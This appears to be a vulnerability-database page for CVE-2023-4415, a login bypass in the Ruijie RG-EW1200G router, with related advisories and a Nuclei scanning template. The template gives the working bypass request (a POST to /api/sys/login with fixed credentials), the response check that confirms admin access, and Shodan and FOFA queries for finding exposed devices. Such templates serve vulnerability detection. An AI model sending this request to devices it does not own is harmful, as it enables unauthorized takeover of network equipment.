| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Exploit for Improper Access Control in Ruijie Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| Exploit for Improper Authentication in Ruijienetworks Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| Exploit for Improper Authentication in Ruijienetworks Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| Exploit for Improper Access Control in Ruijie Rg-Ew1200G_Firmware | 16 Oct 202305:08 | – | githubexploit | |
| CVE-2023-4415 | 18 Aug 202320:38 | – | circl | |
| Ruijie Networks RG-EW1200G 授权问题漏洞 | 18 Aug 202300:00 | – | cnnvd | |
| CVE-2023-4415 | 18 Aug 202316:00 | – | cve | |
| CVE-2023-4415 Ruijie RG-EW1200G login improper authentication | 18 Aug 202316:00 | – | cvelist | |
| CVE-2023-4415 | 18 Aug 202316:15 | – | nvd | |
| CVE-2023-4415 | 18 Aug 202316:15 | – | osv |
id: CVE-2023-4415
info:
name: Ruijie RG-EW1200G Router Background - Login Bypass
author: DhiyaneshDK
severity: high
description: |
A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.
impact: |
Attackers can bypass authentication on the Ruijie RG-EW1200G router through improper authentication checks in the login API, potentially gaining administrative access to the router and compromising network security.
remediation: |
Update Ruijie RG-EW1200G firmware to a version newer than 07161417 r483 that implements proper authentication validation in the login API.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4415
- https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic
- https://vuldb.com/?ctiid.237518
- https://vuldb.com/?id.237518
- https://github.com/thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVE-2023-4415
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-4415
cwe-id: CWE-287
epss-score: 0.56147
epss-percentile: 0.98928
cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ruijienetworks
product: rg-ew1200g_firmware
shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
tags: cve2023,cve,ruijie,router,ruijienetworks,vuln
http:
- method: POST
path:
- "{{BaseURL}}/api/sys/login"
body: |
{
"username":"2",
"password":"admin",
"timestamp":1695218596000
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"result":"ok"'
- '"msg":"登入成功"'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4a0a0047304502210080cb45717af5f95a4639904570599f2f80fda443178c6443b9a2c2749df1c2fa022050d3d8f60af60e3c06ded3dfc7ea04121e74d3b015895e9626884a349d116751:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation